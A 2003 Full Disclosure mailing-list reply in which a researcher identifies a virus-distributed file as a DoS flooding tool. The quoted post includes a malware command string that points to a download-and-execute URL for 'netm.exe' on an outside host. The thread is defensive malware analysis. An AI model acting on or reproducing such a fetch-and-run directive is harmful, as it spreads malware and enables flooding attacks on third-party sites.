Full Disclosure mailing list archives

Re: New virus


From: Joe Stewart <jstewart () lurhq com>
Date: Wed, 26 Nov 2003 08:52:46 -0500

On Tuesday 25 November 2003 5:17 pm, Steven Harrison wrote:
> Just for fun, I pointed my web browser at
> http://finance.red-host.com/events.php and all I got back was:
>
> exec:http://wendy35.phpwebhosting.com/netm.exe
>
> I retrieved that file, and running it 'strings' does imply that it
> will contact a remote website. It could be a copy of the virus (I
> have yet to receive one yet), giving it another way to distribute
> itself, or for the author to distribute improved versions.

It's a DoS attack tool, the target of which is the website you see in 
the strings output. Its only function is to flood the remote host with 
ICMP and HTTP traffic.

-Joe

--
Joe Stewart, GCIH 
Senior Security Researcher
LURHQ http://www.lurhq.com/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

